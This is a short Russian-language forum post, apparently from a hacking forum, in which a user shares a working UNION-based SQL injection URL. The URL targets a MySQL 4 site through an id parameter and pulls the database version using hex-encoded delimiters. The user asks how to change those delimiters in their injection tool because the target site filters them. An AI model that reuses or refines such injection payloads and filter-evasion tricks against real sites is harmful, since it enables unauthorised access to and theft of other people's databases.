18.11.2009, 14:06
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:
PHP код:
http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм
Можно как-то в СИПТ исправить разделители? |
|
|